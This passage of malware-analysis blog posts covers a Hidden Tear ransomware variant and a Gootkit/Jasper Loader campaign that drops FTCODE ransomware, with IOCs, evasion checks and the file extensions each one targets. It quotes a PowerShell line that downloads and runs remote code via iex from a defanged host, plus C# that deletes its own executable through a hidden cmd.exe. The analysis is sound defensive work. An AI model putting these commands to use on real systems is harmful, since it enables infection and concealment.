<span class="n">Arguments</span> <span class="o">=</span> <span class="n">string</span><span class="p">.</span><span class="n">Concat</span><span class="p">(</span><span class="ss">"/C timeout 2 && Del /Q /F "</span><span class="p">,</span> <span class="n">Application</span><span class="p">.</span><span class="n">ExecutablePath</span><span class="p">),</span>
<span class="n">WindowStyle</span> <span class="o">=</span> <span class="n">ProcessWindowStyle</span><span class="p">.</span><span class="n">Hidden</span><span class="p">,</span>
<span class="n">CreateNoWindow</span> <span class="o">=</span> <span class="k">true</span><span class="p">,</span>
<span class="n">FileName</span> <span class="o">=</span> <span class="ss">"cmd.exe"</span>
<span class="err">}</span><span class="p">;</span>
<span class="n">Process</span><span class="p">.</span><span class="k">Start</span><span class="p">(</span><span class="n">processStartInfo</span><span class="p">);</span>
<span class="err">}</span>
</pre></div>
<p></br></p>
<p>4shadow variant available @ <a href="https://app.any.run/tasks/82693192-3d98-41d8-bc0c-18e1fa214683/">Any.Run</a> --> <code>sha256 fd5de1631c95041fde92042dd760e1fe27c7fe217d30e6568cc2e69eb812fb85</code></p>
<p>This sample was found on the IIS Webhost of the Mineral Resources Authority of Papua New Guinea and tries to disguise as a Vodafone PDF Invoice.</p>
<p></br></p>
<p><center><img alt="Hiddentear UPX" src="https://dissectingmalwa.re/img/hiddentear-newguinea.png"></center></p>
<p></br></p>
<p>Throwing the dropped binary into Detect it Easy returns the notice that it pretends to be a WinRAR installer Version 5.x.</p>
<p><center><img alt="Detect it easy" src="https://dissectingmalwa.re/img/hiddentear-sample.png"></center></p>
<p>Extracting the strings out of the mentioned executable (with a relatively new fancy tool by fireeye called <a href="https://github.com/fireeye/stringsifter">stringsifter</a>) one can see that actually includes three references related to WinRAR, where the first is <code>D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb</code>. As for a TIL: sfx stands for "self-extracting archive" which is packaged with an executable to extract it so it's (more or less) independent from the hostsystem. <a href="https://en.wikipedia.org/wiki/Self-extracting_archive">Wikipedia</a>'s got you hooked up.</p>
<p>The full string dump can be had <a href="https://dissectingmalwa.re/stuff/hiddentear-strings.txt">here</a>. It also contains a number of messages in a foreign language which are identified as turkish by Google Translate:</p>
<p></br></p>
<p><center><img alt="Strings found in the binary" src="https://dissectingmalwa.re/img/hiddentear-turkish.png"></center></p>
<p></br></p>
<p><center><img alt="Detect it easy" src="https://dissectingmalwa.re/img/hiddentear-unpack1.png"></center></p>
<p></br></p>
<p>Loading the binary into JustDecompileIt we notice that it was crypted by something called Aika. </p>
<p><center><img alt="Encryption routine" src="https://dissectingmalwa.re/img/hiddentear-netcrypt.png"></center></p>
<p></br></p>
<p>The Assembly Information also gives away that ConfuserEx is involved as well. The payload section confirms that hint as we have an encrypted payload that will be fetched in runtime and then executed via RunPE.</p>
<p><center><img alt="Evidence of ConfuserEx" src="https://dissectingmalwa.re/img/hiddentear-confuserEX.png"></center></p>
<p></br></p>
<p><center><div class="github-card" data-github="1M50RRY/aika-crypter" data-width="400" data-height="150" data-theme="default"></div></center></p>
<p></br></p>
<p>Below you can see a screenshot of the Aika Crypter. As I already mentioned it is based on ConfuserEx and includes the other run of the mill evasion techniques and Injections (RunPE or self). </p>
<p><center><img alt="Aika Crypter" src="https://dissectingmalwa.re/img/hiddentear-aika.png"></center></p>
<p></br></p>
<p>This sample also features an anti-debugging check via IsDebuggerPresent. Nothing we haven't seen before either. (βΜΏΜΏΔΉΜ―ΜΏΜΏβΜΏ ΜΏ)</p>
<p></br></p>
<p><center><img alt="Debugger 1" src="https://dissectingmalwa.re/img/hiddentear-isdbg.png"></center></p>
<p></br></p>
<p><center><img alt="Debugger Trap" src="https://dissectingmalwa.re/img/hiddentear-dbg.png"></center></p>
<p></br></p>
<h2><em>Open Source Ransomware (Malware)?</em></h2>
<p>The main reason why projects like Hidden Tear exist is to use it as a training model and PoC to handle "real" ransomware more efficiently. Critics say that OSS Malware will never match real threats - which is definitely true to some extent - and that it only promotes building weaponized versions of it. On the other hand OSS ransomware is very useful to get a true baseline reading from a sandbox system since you know for sure what it will do next. So what should you think about it know? If you ask me the bad outweighs the good here: Per day multiple new weaponized versions of Hidden Tear hit AnyRun, VT and Co. that are packed/obfuscated or modified with numerous evasion techniques. If it shows us one thing it's that building ransomware isn't hard. Even worse: it is not like ransomware is a dual use tool (like e.g. a hammer). Nobody will call you out for build a PoC binary to better understand the inner workings and how to analyse it afterwards. Don't get me wrong: I'm a HUGE advocate of open source software, but please don't push your "Proof of Concepts" to Github if they can literally be turned into malware by exchanging a URL and Bitcoin address.</p>
<p></br></p>
<h2><em>IOCs</em></h2>
<h3>Hidden Tear (SHA256 / SSDEEP)</h3>
<div class="highlight"><pre><span></span><span class="mi">454364</span><span class="n">vodafone</span><span class="o">-</span><span class="n">e</span><span class="o">-</span><span class="n">fatura</span><span class="p">.</span><span class="n">exe</span>
<span class="n">fd5de1631c95041fde92042dd760e1fe27c7fe217d30e6568cc2e69eb812fb85</span>
<span class="mi">24576</span><span class="p">:</span><span class="mi">8</span><span class="n">NA3R5drXfZAeMQ7MSTlRVHJ88iV4npWuSp008q75pVQNohig1w2YHgLo</span><span class="o">/</span><span class="p">:</span><span class="mi">95</span><span class="n">BAvu7TD1YV0xJYtYOhHdYHr</span><span class="o">/</span>
</pre></div>
<div class="highlight"><pre><span></span><span class="n">cryptoJoker</span><span class="p">.</span><span class="n">exe</span> <span class="o">/</span> <span class="ss">"Shade Ransomware creater is stupid fxxxxx.exe"</span>
<span class="n">ba978eee90be06b1ce303bbee33c680c2779fbbc5b90c83f0674d6989564a70a</span>
<span class="mi">12288</span><span class="p">:</span><span class="n">gnSKwjzsZpds2JbrpolSKwjzuZpXs2JTypo</span><span class="p">:</span><span class="n">USKwWes6lSKw88s</span><span class="o">/</span>
</pre></div>
<h3>URLs</h3>
<div class="highlight"><pre><span></span><span class="n">hxxp</span><span class="p">:</span><span class="o">//</span><span class="n">fairybreathes</span><span class="p">.</span><span class="mi">6</span><span class="n">te</span><span class="p">[.]</span><span class="n">net</span><span class="o">/</span><span class="k">write</span><span class="p">.</span><span class="n">php</span><span class="o">?</span><span class="n">info</span><span class="o">=</span>
</pre></div>
<h3>Affected File Extensions</h3>
<div class="highlight"><pre><span></span><span class="ss">".txt"</span><span class="p">,</span> <span class="ss">".doc"</span><span class="p">,</span> <span class="ss">".docx"</span><span class="p">,</span> <span class="ss">".xls"</span><span class="p">,</span> <span class="ss">".xlsx"</span><span class="p">,</span> <span class="ss">".ppt"</span><span class="p">,</span> <span class="ss">".pptx"</span><span class="p">,</span> <span class="ss">".odt"</span><span class="p">,</span> <span class="ss">"jpeg"</span><span class="p">,</span> <span class="ss">".png"</span><span class="p">,</span> <span class="ss">".csv"</span><span class="p">,</span> <span class="ss">".sql"</span><span class="p">,</span> <span class="ss">".mdb"</span><span class="p">,</span> <span class="ss">".sln"</span><span class="p">,</span> <span class="ss">".php"</span><span class="p">,</span> <span class="ss">".asp"</span><span class="p">,</span> <span class="ss">".aspx"</span><span class="p">,</span> <span class="ss">".html"</span><span class="p">,</span> <span class="ss">".xml"</span><span class="p">,</span> <span class="ss">".psd"</span><span class="p">,</span> <span class="ss">".sql"</span><span class="p">,</span> <span class="ss">".mp4"</span><span class="p">,</span> <span class="ss">".7z"</span><span class="p">,</span> <span class="ss">".rar"</span><span class="p">,</span> <span class="ss">".m4a"</span><span class="p">,</span> <span class="ss">".wma"</span><span class="p">,</span> <span class="ss">".avi"</span><span class="p">,</span> <span class="ss">".wmv"</span><span class="p">,</span> <span class="ss">".csv"</span><span class="p">,</span> <span class="ss">".d3dbsp"</span><span class="p">,</span> <span class="ss">".zip"</span><span class="p">,</span> <span class="ss">".sie"</span><span class="p">,</span> <span class="ss">".sum"</span><span class="p">,</span> <span class="ss">".ibank"</span><span class="p">,</span> <span class="ss">".t13"</span><span class="p">,</span> <span class="ss">".t12"</span><span class="p">,</span> <span class="ss">".qdf"</span><span class="p">,</span> <span class="ss">".gdb"</span><span class="p">,</span> <span class="ss">".tax"</span><span class="p">,</span> <span class="ss">".pkpass"</span><span class="p">,</span> <span class="ss">".bc6"</span><span class="p">,</span> <span class="ss">".bc7"</span><span class="p">,</span> <span class="ss">".bkp"</span><span class="p">,</span> <span class="ss">".qic"</span><span class="p">,</span> <span class="ss">".bkf"</span><span class="p">,</span> <span class="ss">".sidn"</span><span class="p">,</span> <span class="ss">".sidd"</span><span class="p">,</span> <span class="ss">".mddata"</span><span class="p">,</span> <span class="ss">".itl"</span><span class="p">,</span> <span class="ss">".itdb"</span><span class="p">,</span> <span class="ss">".icxs"</span><span class="p">,</span> <span class="ss">".hvpl"</span><span class="p">,</span> <span class="ss">".hplg"</span><span class="p">,</span> <span class="ss">".hkdb"</span><span class="p">,</span> <span class="ss">".mdbackup"</span><span class="p">,</span> <span class="ss">".syncdb"</span><span class="p">,</span> <span class="ss">".gho"</span><span class="p">,</span> <span class="ss">".cas"</span><span class="p">,</span> <span class="ss">".svg"</span><span class="p">,</span> <span class="ss">".map"</span><span class="p">,</span> <span class="ss">".wmo"</span><span class="p">,</span> <span class="ss">".itm"</span><span class="p">,</span> <span class="ss">".sb"</span><span class="p">,</span> <span class="ss">".fos"</span><span class="p">,</span> <span class="ss">".mov"</span><span class="p">,</span> <span class="ss">".vdf"</span><span class="p">,</span> <span class="ss">".ztmp"</span><span class="p">,</span> <span class="ss">".sis"</span><span class="p">,</span> <span class="ss">".sid"</span><span class="p">,</span> <span class="ss">".ncf"</span><span class="p">,</span> <span class="ss">".menu"</span><span class="p">,</span> <span class="ss">".layout"</span><span class="p">,</span> <span class="ss">".dmp"</span><span class="p">,</span> <span class="ss">".blob"</span><span class="p">,</span> <span class="ss">".esm"</span><span class="p">,</span> <span class="ss">".vcf"</span><span class="p">,</span> <span class="ss">".vtf"</span><span class="p">,</span> <span class="ss">".dazip"</span><span class="p">,</span> <span class="ss">".fpk"</span><span class="p">,</span> <span class="ss">".mlx"</span><span class="p">,</span> <span class="ss">".kf"</span><span class="p">,</span> <span class="ss">".iwd"</span><span class="p">,</span> <span class="ss">".vpk"</span><span class="p">,</span> <span class="ss">".tor"</span><span class="p">,</span> <span class="ss">".psk"</span><span class="p">,</span> <span class="ss">".rim"</span><span class="p">,</span> <span class="ss">".w3x"</span><span class="p">,</span> <span class="ss">".fsh"</span><span class="p">,</span> <span class="ss">".ntl"</span><span class="p">,</span> <span class="ss">".arch00"</span><span class="p">,</span> <span class="ss">".lvl"</span><span class="p">,</span> <span class="ss">".snx"</span><span class="p">,</span> <span class="ss">".cfr"</span><span class="p">,</span> <span class="ss">".ff"</span><span class="p">,</span> <span class="ss">".vpp_pc"</span><span class="p">,</span> <span class="ss">".lrf"</span><span class="p">,</span> <span class="ss">".m2"</span><span class="p">,</span> <span class="ss">".mcmeta"</span><span class="p">,</span> <span class="ss">".vfs0"</span><span class="p">,</span> <span class="ss">".mpqge"</span><span class="p">,</span> <span class="ss">".kdb"</span><span class="p">,</span> <span class="ss">".db0"</span><span class="p">,</span> <span class="ss">".dba"</span><span class="p">,</span> <span class="ss">".rofl"</span><span class="p">,</span> <span class="ss">".hkx"</span><span class="p">,</span> <span class="ss">".bar"</span><span class="p">,</span> <span class="ss">".upk"</span><span class="p">,</span> <span class="ss">".das"</span><span class="p">,</span> <span class="ss">".iwi"</span><span class="p">,</span> <span class="ss">".litemod"</span><span class="p">,</span> <span class="ss">".asset"</span><span class="p">,</span> <span class="ss">".forge"</span><span class="p">,</span> <span class="ss">".ltx"</span><span class="p">,</span> <span class="ss">".bsa"</span><span class="p">,</span> <span class="ss">".apk"</span><span class="p">,</span> <span class="ss">".re4"</span><span class="p">,</span> <span class="ss">".sav"</span><span class="p">,</span> <span class="ss">".lbf"</span><span class="p">,</span> <span class="ss">".slm"</span><span class="p">,</span> <span class="ss">".bik"</span><span class="p">,</span> <span class="ss">".epk"</span><span class="p">,</span> <span class="ss">".rgss3a"</span><span class="p">,</span> <span class="ss">".pak"</span><span class="p">,</span> <span class="ss">".big"</span><span class="p">,</span> <span class="ss">"wallet"</span><span class="p">,</span> <span class="ss">".wotreplay"</span><span class="p">,</span> <span class="ss">".xxx"</span><span class="p">,</span> <span class="ss">".desc"</span><span class="p">,</span> <span class="ss">".py"</span><span class="p">,</span> <span class="ss">".m3u"</span><span class="p">,</span> <span class="ss">".flv"</span><span class="p">,</span> <span class="ss">".js"</span><span class="p">,</span> <span class="ss">".css"</span><span class="p">,</span> <span class="ss">".rb"</span><span class="p">,</span> <span class="ss">".p7c"</span><span class="p">,</span> <span class="ss">".pk7"</span><span class="p">,</span> <span class="ss">".p7b"</span><span class="p">,</span> <span class="ss">".p12"</span><span class="p">,</span> <span class="ss">".pfx"</span><span class="p">,</span> <span class="ss">".pem"</span><span class="p">,</span> <span class="ss">".crt"</span><span class="p">,</span> <span class="ss">".cer"</span><span class="p">,</span> <span class="ss">".der"</span><span class="p">,</span> <span class="ss">".x3f"</span><span class="p">,</span> <span class="ss">".srw"</span><span class="p">,</span> <span class="ss">".pef"</span><span class="p">,</span> <span class="ss">".ptx"</span><span class="p">,</span> <span class="ss">".r3d"</span><span class="p">,</span> <span class="ss">".rw2"</span><span class="p">,</span> <span class="ss">".rwl"</span><span class="p">,</span> <span class="ss">".raw"</span><span class="p">,</span> <span class="ss">".raf"</span><span class="p">,</span> <span class="ss">".orf"</span><span class="p">,</span> <span class="ss">".nrw"</span><span class="p">,</span> <span class="ss">".mrwref"</span><span class="p">,</span> <span class="ss">".mef"</span><span class="p">,</span> <span class="ss">".erf"</span><span class="p">,</span> <span class="ss">".kdc"</span><span class="p">,</span> <span class="ss">".dcr"</span><span class="p">,</span> <span class="ss">".cr2"</span><span class="p">,</span> <span class="ss">".crw"</span><span class="p">,</span> <span class="ss">".bay"</span><span class="p">,</span> <span class="ss">".sr2"</span><span class="p">,</span> <span class="ss">".srf"</span><span class="p">,</span> <span class="ss">".arw"</span><span class="p">,</span> <span class="ss">".3fr"</span><span class="p">,</span> <span class="ss">".dng"</span><span class="p">,</span> <span class="ss">".jpe"</span><span class="p">,</span> <span class="ss">".jpg"</span><span class="p">,</span> <span class="ss">".cdr"</span><span class="p">,</span> <span class="ss">".indd"</span><span class="p">,</span> <span class="ss">".ai"</span><span class="p">,</span> <span class="ss">".eps"</span><span class="p">,</span> <span class="ss">".pdf"</span><span class="p">,</span> <span class="ss">".pdd"</span><span class="p">,</span> <span class="ss">".dbf"</span><span class="p">,</span> <span class="ss">".mdf"</span><span class="p">,</span> <span class="ss">".wb2"</span><span class="p">,</span> <span class="ss">".rtf"</span><span class="p">,</span> <span class="ss">".wpd"</span><span class="p">,</span> <span class="ss">".dxg"</span><span class="p">,</span> <span class="ss">".xf"</span><span class="p">,</span> <span class="ss">".dwg"</span><span class="p">,</span> <span class="ss">".pst"</span><span class="p">,</span> <span class="ss">".accdb"</span><span class="p">,</span> <span class="ss">".mdb"</span><span class="p">,</span> <span class="ss">".pptm"</span><span class="p">,</span> <span class="ss">".pptx"</span><span class="p">,</span> <span class="ss">".ppt"</span><span class="p">,</span> <span class="ss">".xlk"</span><span class="p">,</span> <span class="ss">".xlsb"</span><span class="p">,</span> <span class="ss">".xlsm"</span><span class="p">,</span> <span class="ss">".xlsx"</span><span class="p">,</span> <span class="ss">".xls"</span><span class="p">,</span> <span class="ss">".wps"</span><span class="p">,</span> <span class="ss">".docm"</span><span class="p">,</span> <span class="ss">".docx"</span><span class="p">,</span> <span class="ss">".doc"</span><span class="p">,</span> <span class="ss">".odb"</span><span class="p">,</span> <span class="ss">".odc"</span><span class="p">,</span> <span class="ss">".odm"</span><span class="p">,</span> <span class="ss">".odp"</span><span class="p">,</span> <span class="ss">".ods"</span><span class="p">,</span> <span class="ss">".odt"</span><span class="p">,</span> <span class="ss">".lnk"</span><span class="p">,</span> <span class="ss">".iso"</span>
</pre></div>
<p></br></p>Nicht so goot - Breaking down Gootkit and Jasper (+ FTCODE)2019-10-02T00:00:00+02:002019-10-02T00:00:00+02:00f0wLtag:dissectingmalwa.re,2019-10-02:/nicht-so-goot-breaking-down-gootkit-and-jasper-ftcode.html<p>Pun intended. Gootkit is one of the most spread banking malware at the moment and I deemed it a good opportunity to deobfuscate a bit of scrambled code</p><p><center><img alt="A strange screenshot" src="https://dissectingmalwa.re/img/gootkit-img.png"></center></p>
<p></br></p>
<h4><em>A short disclaimer: downloading and running the samples linked below will compromise your computer and data, so be f$cking careful. Also check with your local laws as owning malware binaries/ sources might be illegal depending on where you live.</em></h4>
<p>Gootkit Stage 3 Sample available @ <a href="https://www.hybrid-analysis.com/sample/3e846a7316dbc15a38cfd522b14ad3f1a72d79959cbae9fd14621400d77cbc37/5d9887a1038838f483c956f3">Hybrid Analysis</a> --> <code>3e846a7316dbc15a38cfd522b14ad3f1a72d79959cbae9fd14621400d77cbc37</code></p>
<p></br></p>
<p><center><blockquote class="twitter-tweet"><p lang="en" dir="ltr"><a href="https://twitter.com/hashtag/gootkit?src=hash&ref_src=twsrc%5Etfw">#gootkit</a> <a href="https://twitter.com/hashtag/jasperloader?src=hash&ref_src=twsrc%5Etfw">#jasperloader</a> <a href="https://twitter.com/hashtag/banker?src=hash&ref_src=twsrc%5Etfw">#banker</a> <br>Js<a href="https://t.co/PsYBIeph19">https://t.co/PsYBIeph19</a><br>Payload<a href="https://t.co/hLThGNJDiK">https://t.co/hLThGNJDiK</a><br>IOCs<br>wws.tkgventures.[com <br>-> ont.carolinabeercompany.[com/bolp.cab<br>s/adp.reevesandcompany.[com/rbody320<a href="https://twitter.com/VK_Intel?ref_src=twsrc%5Etfw">@VK_Intel</a> <a href="https://twitter.com/malwrhunterteam?ref_src=twsrc%5Etfw">@malwrhunterteam</a> <a href="https://twitter.com/James_inthe_box?ref_src=twsrc%5Etfw">@James_inthe_box</a> <a href="https://twitter.com/reecdeep?ref_src=twsrc%5Etfw">@reecdeep</a></p>— JAMESWT (@JAMESWT_MHT) <a href="https://twitter.com/JAMESWT_MHT/status/1174296059344015361?ref_src=twsrc%5Etfw">September 18, 2019</a></blockquote> <script async src="https://platform.twitter.com/widgets.js" charset="utf-8"></script></center> </p>
<p></br></p>
<p><center><img alt="GootkitsΒ΄ Infection Path" src="https://dissectingmalwa.re/img/gootkit-infectionpath.png"></center></p>
<p></br></p>
<p><center><div class="github-card" data-github="f0wl/GootJasperDeobfuscator" data-width="400" data-height="" data-theme="default"></div>
<script src="//cdn.jsdelivr.net/github-cards/latest/widget.js"></script></center></p>
<p>With the obfuscated Javascript and VB Script samples I thought it would be a good idea to build a simple python script to clean up the mess Jasper Loader left us. If I come across a newer version I'll update the script, other than that Forks and PRs are always welcome as well.</p>
<p></br></p>
<p>The VB script as a first stage isn't really that sophisticated. Basically the 2947 lines of one ASCII character each represented as an integer with "302" added to it are each converted back to a char and added to the string <em>fjuu</em> which gets executed via WScript after the decoding is complete. The dumped command is once again a long powershell command with a base64 segment. </p>
<p><center><img alt="Obfuscated VB Script" src="https://dissectingmalwa.re/img/gootkit-vbs.png"></center></p>
<p></br></p>
<p>This PS snippet will download and display the weird online pet store order confirmation and the second stage of the Jasper Loader (an obfuscated Javascript file).</p>
<p><center><img alt="Decoded Base64 Section of the PS Payload" src="https://dissectingmalwa.re/img/gootkit-vbsb64.png"></center></p>
<p></br></p>
<p>The JS Stage includes a few unused variables, entangled functions and scrambled strings. These strings are then concancated to one big string in an array which in turn is used in two replacement functions and then gets split. The last step is a loop which calls the <em>geejc</em> function and selects every second character from the array to form the final powershell payload. The PS command contains a base64 encoded string which I decoded as a separate step in the script. Pretty easy so far...</p>
<p><center><img alt="Obfuscated Javascript" src="https://dissectingmalwa.re/img/gootkit-js.png"></center></p>
<p></br></p>
<p><center><img alt="js Extract deobfuscated" src="https://dissectingmalwa.re/img/gootkit-decr1.png"></center></p>
<p></br></p>
<p>Probably the easiest way to identify a Jasper Loader is by looking at the characteristic conditional at the top of the decoded base64 segment. First it checks the the localization of the UI for Systems from China, Romania, Russia, Ukraine or Belarus and exits if this condition is true. Jasper will also quit if the WMI Computer_Model query returns a string related to a VM Guest system for anti-analysis and sandbox evasion purposes.</p>
<p><center><img alt="js Extract Base64" src="https://dissectingmalwa.re/img/gootkit-decr2.png"></center></p>
<p></br></p>
<p><center><img alt="Detect it easy" src="https://dissectingmalwa.re/img/gootkit-die.png"></center></p>
<p></br></p>
<p><center><img alt="bolp.inf File" src="https://dissectingmalwa.re/img/gootkit-inf.png"></center></p>
<p><center>A Setup Information (<em>.inf</em>) file dropped by the PE payload.</center></p>
<p></br></p>
<p><center><img alt="IDA: Screwed up call graph" src="https://dissectingmalwa.re/img/gootkit-idafsckup.png"></center></p>
<p>Looks like we've got some anti-analysis tricks with this binary as well...either way IDA Free does not really like it and complains about being unable to fetch the Imports π€ Scrambled Import Address Table anyone ? We'll take a closer peak later</p>
<p></br></p>
<p><center><blockquote class="twitter-tweet"><p lang="en" dir="ltr">NEW <a href="https://twitter.com/hashtag/FTCODE?src=hash&ref_src=twsrc%5Etfw">#FTCODE</a> <a href="https://twitter.com/hashtag/Ransomware?src=hash&ref_src=twsrc%5Etfw">#Ransomware</a> extension .FTCODE!Ransom note;READ_ME_NOW.htm <a href="https://twitter.com/BleepinComputer?ref_src=twsrc%5Etfw">@BleepinComputer</a> <a href="https://twitter.com/LawrenceAbrams?ref_src=twsrc%5Etfw">@LawrenceAbrams</a> <a href="https://twitter.com/demonslay335?ref_src=twsrc%5Etfw">@demonslay335</a> <a href="https://twitter.com/Amigo_A_?ref_src=twsrc%5Etfw">@Amigo_A_</a> <a href="https://t.co/Uc7OTIgg71">pic.twitter.com/Uc7OTIgg71</a></p>— Cyber Security (@GrujaRS) <a href="https://twitter.com/GrujaRS/status/1178776848244920320?ref_src=twsrc%5Etfw">September 30, 2019</a></blockquote> <script async src="https://platform.twitter.com/widgets.js" charset="utf-8"></script></center></p>
<p></br></p>
<p>Another Version of the Gootkit/Jasper combo surfaced on September 26th when they swapped out the 3rd stage payload with FTCODE. Against the believe of some researchers this PowerShell based ransomware is not new and was first spotted in 2013 by Sophos Analysts as decribed in this <a href="https://nakedsecurity.sophos.com/2013/03/05/russian-ransomware-windows-powershell/">article</a>. The Link to the Any.Run Analysis of the malicious Word Document can be found <a href="https://app.any.run/tasks/3ac76703-6bcf-4fe9-86c2-91975a193428/">here</a>.</p>
<p><center><img alt="Malicious Word Document" src="https://dissectingmalwa.re/img/gootkit-doc.png"></center></p>
<p><center>The malicios macro in the Word document will download and execute the FTCODE PowerShell ransomware right away.</center></p>
<div class="highlight"><pre><span></span><span class="ss">"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"</span><span class="w"> </span><span class="err">$</span><span class="n">atwsxvg</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="o">[</span><span class="n">string</span><span class="o">][</span><span class="n">System.Text.Encoding</span><span class="o">]::</span><span class="nf">ASCII</span><span class="p">.</span><span class="n">GetString</span><span class="p">(</span><span class="o">[</span><span class="n">System.Convert</span><span class="o">]::</span><span class="n">FromBase64String</span><span class="p">(</span><span class="w"> </span><span class="s1">';;try{$a=(New-Object Net.WebClient).DownloadString("hxxp://aweb.theshotboard[.]info/?page=xing&vid=dc1:load");iex $a;}catch{}'</span><span class="w"> </span><span class="p">)</span><span class="w"> </span><span class="p">);</span><span class="n">iex</span><span class="w"> </span><span class="err">$</span><span class="n">atwsxvg</span><span class="p">;</span><span class="w"></span>
</pre></div>
<p></br></p>
<p><center><img alt="BXCODE string" src="https://dissectingmalwa.re/img/gootkit-bxcode.png"></center></p>
<p>Maybe a reference to the developer/ group behind this attack? We won't know for sure, but the string "BXCODE hack your system" is present in all recent occurences of FTCODE.</p>
<p></br></p>
<p><center><img alt="FTCode string" src="https://dissectingmalwa.re/img/gootkit-ft0.png"></center></p>
<p>Ladies and Gentlemen, this is the part of the code that gave today's ransomware it's name. It will append the extension <em>.FTCODE</em> to every encrypted file and drop a HTML ransomnote in the respective directories.</p>
<p></br></p>
<p><center><img alt="Jasper Country Query" src="https://dissectingmalwa.re/img/gootkit-jaspercountry.png"></center></p>
<p><center>Again, this PS script also features the "kill switch"/ evasion technique found in Jasper.</center></p>
<p><center><img alt="Jasper VM Query" src="https://dissectingmalwa.re/img/gootkit-jaspervm.png"></center></p>
<p></br></p>
<p><center><img alt="Communication with the C2" src="https://dissectingmalwa.re/img/gootkit-ft1.png"></center></p>
<p>Communication with the C&C Server is accomplished via <em>System.Net.Webclient</em> and POST commands to the hardcoded address. In this case the victim ID (a UUID) and the generated encryption key are transmitted (in plain text, a packet capture would get you the key and therefore your data back without paying the cyber-criminals :D ).</p>
<p></br></p>
<p><center><img alt="Killswitch File" src="https://dissectingmalwa.re/img/gootkit-killswitch.png"></center></p>
<p>Looks like FTCODE actually has a killswitch: A if a file called <em>w00log03.tmp</em> is present in <em>%PUBLIC%\OracleKit</em> the ransomware will create a new file called <em>good_day.log</em> and exit.</p>
<p></br></p>
<p><center><img alt="HTML Ransomnote" src="https://dissectingmalwa.re/img/gootkit-ft2.png"></center></p>
<p>Another run-of-the-mill behaviour of ransomware these days is to disable the recovery mode, delete the system backups and shadow copies. So nothing really new here either..</p>
<p></br></p>
<p>FTCODE will encrypt all files with the follwing extensions:</p>
<div class="highlight"><pre><span></span><span class="ss">"*.sql"</span><span class="p">,</span><span class="ss">"*.mp4"</span><span class="p">,</span><span class="ss">"*.7z"</span><span class="p">,</span><span class="ss">"*.rar"</span><span class="p">,</span><span class="ss">"*.m4a"</span><span class="p">,</span><span class="ss">"*.wma"</span><span class="p">,</span><span class="ss">"*.avi"</span><span class="p">,</span><span class="ss">"*.wmv"</span><span class="p">,</span><span class="ss">"*.csv"</span><span class="p">,</span><span class="ss">"*.d3dbsp"</span><span class="p">,</span><span class="ss">"*.zip"</span><span class="p">,</span><span class="ss">"*.sie"</span><span class="p">,</span><span class="ss">"*.sum"</span><span class="p">,</span><span class="ss">"*.ibank"</span><span class="p">,</span><span class="ss">"*.t13"</span><span class="p">,</span><span class="ss">"*.t12"</span><span class="p">,</span><span class="ss">"*.qdf"</span><span class="p">,</span><span class="ss">"*.gdb"</span><span class="p">,</span><span class="ss">"*.tax"</span><span class="p">,</span><span class="ss">"*.pkpass"</span><span class="p">,</span><span class="ss">"*.bc6"</span><span class="p">,</span><span class="ss">"*.bc7"</span><span class="p">,</span><span class="ss">"*.bkp"</span><span class="p">,</span><span class="ss">"*.qic"</span><span class="p">,</span><span class="ss">"*.bkf"</span><span class="p">,</span><span class="ss">"*.sidn"</span><span class="p">,</span><span class="ss">"*.sidd"</span><span class="p">,</span><span class="ss">"*.mddata"</span><span class="p">,</span><span class="ss">"*.itl"</span><span class="p">,</span><span class="ss">"*.itdb"</span><span class="p">,</span><span class="ss">"*.icxs"</span><span class="p">,</span><span class="ss">"*.hvpl"</span><span class="p">,</span><span class="ss">"*.hplg"</span><span class="p">,</span><span class="ss">"*.hkdb"</span><span class="p">,</span><span class="ss">"*.mdbackup"</span><span class="p">,</span><span class="ss">"*.syncdb"</span><span class="p">,</span><span class="ss">"*.gho"</span><span class="p">,</span><span class="ss">"*.cas"</span><span class="p">,</span><span class="ss">"*.svg"</span><span class="p">,</span><span class="ss">"*.map"</span><span class="p">,</span><span class="ss">"*.wmo"</span><span class="p">,</span><span class="ss">"*.itm"</span><span class="p">,</span><span class="ss">"*.sb"</span><span class="p">,</span><span class="ss">"*.fos"</span><span class="p">,</span><span class="ss">"*.mov"</span><span class="p">,</span><span class="ss">"*.vdf"</span><span class="p">,</span><span class="ss">"*.ztmp"</span><span class="p">,</span><span class="ss">"*.sis"</span><span class="p">,</span><span class="ss">"*.sid"</span><span class="p">,</span><span class="ss">"*.ncf"</span><span class="p">,</span><span class="ss">"*.menu"</span><span class="p">,</span><span class="ss">"*.layout"</span><span class="p">,</span><span class="ss">"*.dmp"</span><span class="p">,</span><span class="ss">"*.blob"</span><span class="p">,</span><span class="ss">"*.esm"</span><span class="p">,</span><span class="ss">"*.vcf"</span><span class="p">,</span><span class="ss">"*.vtf"</span><span class="p">,</span><span class="ss">"*.dazip"</span><span class="p">,</span><span class="ss">"*.fpk"</span><span class="p">,</span><span class="ss">"*.mlx"</span><span class="p">,</span><span class="ss">"*.kf"</span><span class="p">,</span><span class="ss">"*.iwd"</span><span class="p">,</span><span class="ss">"*.vpk"</span><span class="p">,</span><span class="ss">"*.tor"</span><span class="p">,</span><span class="ss">"*.psk"</span><span class="p">,</span><span class="ss">"*.rim"</span><span class="p">,</span><span class="ss">"*.w3x"</span><span class="p">,</span><span class="ss">"*.fsh"</span><span class="p">,</span><span class="ss">"*.ntl"</span><span class="p">,</span><span class="ss">"*.arch00"</span><span class="p">,</span><span class="ss">"*.lvl"</span><span class="p">,</span><span class="ss">"*.snx"</span><span class="p">,</span><span class="ss">"*.cfr"</span><span class="p">,</span><span class="ss">"*.ff"</span><span class="p">,</span><span class="ss">"*.vpp_pc"</span><span class="p">,</span><span class="ss">"*.lrf"</span><span class="p">,</span><span class="ss">"*.m2"</span><span class="p">,</span><span class="ss">"*.mcmeta"</span><span class="p">,</span><span class="ss">"*.vfs0"</span><span class="p">,</span><span class="ss">"*.mpqge"</span><span class="p">,</span><span class="ss">"*.kdb"</span><span class="p">,</span><span class="ss">"*.db0"</span><span class="p">,</span><span class="ss">"*.dba"</span><span class="p">,</span><span class="ss">"*.rofl"</span><span class="p">,</span><span class="ss">"*.hkx"</span><span class="p">,</span><span class="ss">"*.bar"</span><span class="p">,</span><span class="ss">"*.upk"</span><span class="p">,</span><span class="ss">"*.das"</span><span class="p">,</span><span class="ss">"*.iwi"</span><span class="p">,</span><span class="ss">"*.litemod"</span><span class="p">,</span><span class="ss">"*.asset"</span><span class="p">,</span><span 